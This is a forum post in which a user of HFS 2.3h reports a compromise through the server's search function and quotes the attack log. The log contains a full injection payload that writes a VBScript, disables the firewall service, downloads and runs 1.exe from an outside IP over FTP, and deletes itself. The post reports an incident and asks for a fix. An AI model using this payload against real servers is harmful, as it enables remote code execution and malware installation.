I am running HFS 2.3h and got hacked via the search function in HFS. The hacker was able to create and execute a vbsscript, which failed because the file they attempted to download was not found.
See log below. There is a NUL character between ?search== and {.save|6.vbs...
I have disabled HFS at the moment and waiting for a fix.
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.save|6.vbs|a=replace("set*objshell=createobject(""wscript.shell""):objshell.run(""%comspec%*/k*cmd*/c*net1*stop*sharedaccess&echo*open*43.160.195.78>*cmd.txt&echo*123>>*cmd.txt&echo*123>>*cmd.txt&echo*binary*>>*cmd.txt&echo*get*1.exe*>>*cmd.txt&echo*bye*>>*cmd.txt&ftp*-s:cmd.txt&ftp*-s:cmd.txt&start*1.exe*start*1.exe&del*cmd.txt""),1,true","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
2016-06-13 15:58:52 104.148.61.9 1740 Served 3.9 K
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.exec|6.vbs|.}
I have tried just entering the URL requests in my browser with and without the NUL after == and managed to create files in the HFS folder.
A similar exploit has been mentioned before in this forum
https://www.exploit-db.com/exploits/34668/